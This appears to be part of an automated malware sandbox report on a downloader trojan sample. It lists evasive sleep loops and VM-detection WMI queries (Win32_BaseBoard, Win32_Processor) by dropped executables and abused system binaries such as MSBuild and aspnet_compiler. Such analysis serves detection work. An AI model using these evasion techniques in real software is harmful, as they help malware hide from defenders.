Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 1200000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 1199866
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 1199765
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 599979
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 599766
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 598860
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 598750
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 598611
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 597672
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 597560
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 597452
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5043 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4815 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7678
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 4248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 5594
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7907
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1753
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Window / User API: threadDelayed 5192
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Window / User API: threadDelayed 4600
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe TID: 4448 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe TID: 5460 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe TID: 656 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2264 Thread sleep count: 5043 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4228 Thread sleep count: 4815 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3136 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe TID: 3320 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe TID: 3784 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4420 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4220 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3528 Thread sleep count: 7678 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5680 Thread sleep count: 2005 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5268 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep count: 43 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -39660499758475511s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2376 Thread sleep count: 4248 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -59858s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -59750s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -59614s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -59469s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2376 Thread sleep count: 5594 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -59333s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -59211s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -59101s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -58989s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -58875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -58765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -58645s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -58526s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -58422s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -58304s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -58203s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -58092s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -57984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -57874s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -57765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -57655s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -57547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -57434s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -57328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -57218s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -57109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -57000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -56888s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -56781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -56671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -56562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -56453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -56343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -56208s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -56093s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -55975s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -55873s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -55765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -55656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -55547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -55434s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -55305s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1208 Thread sleep time: -340000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -59863s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -59641s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1208 Thread sleep time: -598000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -59889s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -59781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2848 Thread sleep time: -59671s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe TID: 6492 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe TID: 6580 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe TID: 3644 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe TID: 5456 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe TID: 372 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6080 Thread sleep count: 7907 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1900 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3276 Thread sleep count: 1753 > 30
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe TID: 1624 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe TID: 6184 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe TID: 3468 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5512 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -300000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59805s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59688s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59469s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -118718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59249s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3348 Thread sleep time: -720000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -1200000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -1199866s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -1199765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59885s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59641s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59508s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59391s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59282s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -599979s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -599875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -599766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59650s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59517s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59390s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59225s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -598860s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -598750s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -598611s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59438s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59309s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59191s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -597672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -597560s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -597452s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59872s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59711s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 4272 Thread sleep time: -59472s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe TID: 2144 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe TID: 1232 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
